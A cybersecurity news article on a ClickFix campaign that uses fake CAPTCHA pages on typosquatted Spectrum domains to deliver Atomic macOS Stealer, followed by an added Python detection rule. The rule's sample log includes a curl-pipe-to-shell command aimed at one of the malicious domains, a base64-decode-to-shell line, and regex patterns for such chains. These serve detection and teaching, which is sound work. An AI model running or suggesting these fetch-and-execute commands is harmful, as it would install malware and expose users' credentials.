New Malware Campaign Targets macOS Users with Atomic Stealer Using ClickFix Tactic

Cybersecurity researchers have uncovered a new malware campaign targeting Apple macOS users with a technique known as ClickFix, which tricks victims into executing malicious code manually. The goal is to install Atomic macOS Stealer (AMOS)—a powerful malware capable of harvesting sensitive data such as system passwords, browser credentials, and cryptocurrency wallet information.

How the Campaign Works

According to CloudSEK, the campaign begins on typosquatted domains impersonating U.S. telecom provider Spectrum (e.g., panel-spectrum[.]net, spectrum-ticket[.]net). When users visit the fake website, they are shown a bogus hCaptcha page that urges them to prove they’re not a robot.

After clicking the “I am human” checkbox, a fake error message appears stating that CAPTCHA verification failed. It then presents an "Alternative Verification" method, instructing the user to copy a command and run it in the macOS Terminal. This command downloads and executes a malicious shell script.

What the Script Does

  • Prompts for the user’s system password under the guise of verification

  • Bypasses security mechanisms using native macOS commands

  • Downloads and installs Atomic Stealer (AMOS)

  • Begins exfiltrating credentials, browser data, and wallet info

Interestingly, the malware code includes Russian-language comments, suggesting the involvement of Russian-speaking developers.

Indicators of a Hastily Built Campaign

The delivery infrastructure is described as poorly implemented:

  • Linux users are provided PowerShell commands, which are incompatible with Linux

  • Both Windows and macOS users are instructed to "Press & hold the Windows Key + R"

  • User-agent detection that does not match the platform-specific instructions the page serves

These inconsistencies do not impact the malware’s effectiveness but demonstrate sloppiness in execution.

Broader ClickFix Use and Variants

ClickFix has become a popular vector for delivering malware across multiple platforms. It has been seen distributing:

  • XWorm RAT

  • PureLogs Stealer

  • DanaBot

  • NetSupport RAT

Threat actors use fake CAPTCHA and consent banners as bait, sometimes embedded within real, compromised websites. These deceptive prompts lead users to copy/paste malicious commands under the guise of verifying access or accepting cookies.

What You Can Do

To defend against these threats:

  • Users should never execute scripts or commands prompted by websites.

  • Organizations should educate staff about these tactics and monitor Terminal or PowerShell usage patterns.

  • Security teams should flag any unknown scripts executing from user directories or triggered by browser activity.
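The last two recommendations (watch Terminal usage, flag unknown scripts run from user directories or triggered by browser activity) can be turned into a simple triage rule. The following Python script is an added example, not tooling from Cyber Syrup, CloudSEK or SlashNext. It assumes an EDR or log collector emits one JSON object per process start with the fields `ts`, `user`, `process`, `ancestry` and `cmdline`; that format, the process names, the scoring weights and the threshold are all assumptions, and the sample events are constructed. The two watch-listed domains are the ones named in the article.

```python
"""Score macOS shell launches for ClickFix-style download-and-execute behaviour.

Added example (not the article's or any vendor's code). Event schema, process
names, weights and threshold are assumptions; sample events are constructed.
"""
import json
import re

# Process names a person normally types commands into (assumed names).
TERMINALS = {"Terminal", "iTerm2"}
# A browser anywhere in the ancestry means the shell was "triggered by browser activity".
BROWSERS = {"Safari", "Google Chrome", "Firefox", "Microsoft Edge"}
SHELLS = {"sh", "bash", "zsh"}

# Typosquat domains from the article, de-fanged in the text; normalised to match live logs.
WATCHLIST = {d.replace("[.]", ".") for d in ("panel-spectrum[.]net", "spectrum-ticket[.]net")}

DOWNLOAD_TOOL = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
BASE64_DECODE = re.compile(r"\bbase64\b[^|]*\s(?:-d|-D|--decode)\b")
USER_OR_TMP_PATH = re.compile(r"(?:^|\s)(?:/Users/[^/\s]+/|/private/tmp/|/tmp/)")

THRESHOLD = 4  # assumed: tune against your own baseline of developer activity


def score_event(ev):
    """Return (score, reasons) for one process-start event (a dict)."""
    score, reasons = 0, []
    if ev.get("process") not in SHELLS:
        return 0, reasons  # only shell launches are in scope for this rule
    cmd = ev.get("cmdline", "")
    chain = ev.get("ancestry", [])
    if DOWNLOAD_TOOL.search(cmd) and PIPE_TO_SHELL.search(cmd):
        score += 3
        reasons.append("download piped straight into a shell")
    if BASE64_DECODE.search(cmd):
        score += 2
        reasons.append("base64-decoded payload on the command line")
    if USER_OR_TMP_PATH.search(cmd):
        score += 2
        reasons.append("script path under a user or temp directory")
    if any(p in BROWSERS for p in chain):
        score += 2
        reasons.append("browser in process ancestry")
    if any(d in cmd for d in WATCHLIST):
        score += 3
        reasons.append("known ClickFix domain in command line")
    return score, reasons


def triage(jsonl_text):
    """Parse JSON-lines events and return those scoring at or above THRESHOLD."""
    flagged = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= THRESHOLD:
            flagged.append({"ts": ev["ts"], "user": ev["user"], "score": score,
                            "reasons": reasons, "cmdline": ev["cmdline"]})
    return flagged


# Constructed sample events: two ordinary developer commands, one ClickFix-style
# paste into Terminal, one browser-spawned shell decoding a blob, one benign
# script run from a home directory. "aGVsbG8K" is just base64 for "hello".
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ts": "2025-06-03T10:01:12Z", "user": "alice", "process": "zsh",
     "ancestry": ["launchd", "Terminal"], "cmdline": "brew update"},
    {"ts": "2025-06-03T10:02:40Z", "user": "alice", "process": "zsh",
     "ancestry": ["launchd", "Terminal"],
     "cmdline": "curl -fsSL https://example.com/file.tar.gz -o file.tar.gz"},
    {"ts": "2025-06-03T10:05:03Z", "user": "alice", "process": "sh",
     "ancestry": ["launchd", "Terminal", "zsh"],
     "cmdline": "curl -fsSL https://panel-spectrum.net/verify | sh"},
    {"ts": "2025-06-03T10:07:55Z", "user": "alice", "process": "sh",
     "ancestry": ["launchd", "Safari"],
     "cmdline": "echo aGVsbG8K | base64 -d | sh"},
    {"ts": "2025-06-03T10:09:30Z", "user": "bob", "process": "bash",
     "ancestry": ["launchd", "Terminal"],
     "cmdline": "bash /Users/bob/scripts/backup.sh"},
])

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['user']} score={hit['score']}: {hit['cmdline']}")
        for r in hit["reasons"]:
            print("   -", r)
```

Run against the constructed log, the rule flags the pasted download-and-execute chain (score 6) and the browser-spawned decoder (score 4) while the `brew`, plain `curl -o` and home-directory backup script stay below the threshold. The weights are deliberately additive so a single weak signal (a script under `/Users`) never fires on its own; in production the domain watch list would be fed from threat intelligence rather than hard-coded.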

As Daniel Kelley of SlashNext put it, “Attackers exploit ‘verification fatigue,’ knowing users are conditioned to click through CAPTCHA prompts quickly.” This tactic capitalizes on routine behavior to bypass security defenses.

Conclusion

This campaign shows how attackers are evolving beyond simple phishing to manipulate human behavior in more sophisticated ways. By disguising malware delivery as routine security verification, threat actors effectively bypass defenses—reminding us that social engineering remains one of the most potent tools in the cybercriminal playbook.